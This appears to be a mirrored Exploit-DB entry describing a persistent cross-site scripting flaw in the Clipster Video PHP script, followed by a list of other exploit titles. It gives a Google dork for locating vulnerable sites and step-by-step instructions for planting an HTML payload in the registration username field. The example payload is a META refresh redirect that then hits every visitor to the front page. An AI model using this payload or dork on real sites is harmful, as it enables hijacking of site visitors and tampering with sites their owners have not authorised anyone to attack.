Clipster Video – Persistent Cross-Site Scripting

Exploit Database
14 阅读

作者： DaOne

日期： 2012-09-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/21133/

##########################################
[~] Exploit Title: Clipster Video Persistent XSS Vulnerability 
[~] Date: 04/09/2012
[~] Author: DaOne
[~] Software Link: http://www.clipsterscript.com/
[~] Google Dork: "Powered by ClipsterScript.com"
##########################################

[#] How to exploit:

1-go to : http://site.com/login.php?action=Register
2-Put in the Username field the XSS Code => Example:<META http-equiv="refresh" content="0;URL=http://www.google.com">
3-Put anything in the other field [Password & E-mail] etc...
4-Now anyone go there : http://site.com/ will redirected to google.com or exploit your XSS Code.



##########################################
[*] Contact me
www.facebook.com/LibyanCA2
##########################################

last Exploits
Clipster Video – Persistent Cross-Site Scripting的更多信息

WonderCMS 3.1.3 – Authenticated SSRF to Remote Remote Code Execution：
Facebook Clone Script 1.0.5 – ‘search’ SQL Injection：
Openreglement 1.04 – Local File Inclusion / Remote File Inclusion：
MiCasaVerde VeraLite 1.5.408 – Multiple Vulnerabilities：
FTP Voyager Scheduler 16.2.0 – Cross-Site Request Forgery：
Card Payment 1.0 – Cross-Site Request Forgery (Update Admin)：
Joomla! Component OrgChart 1.0.0 – Local File Inclusion：
MotoCMS Version 3.4.3 – Server-Side Template Injection (SSTI)：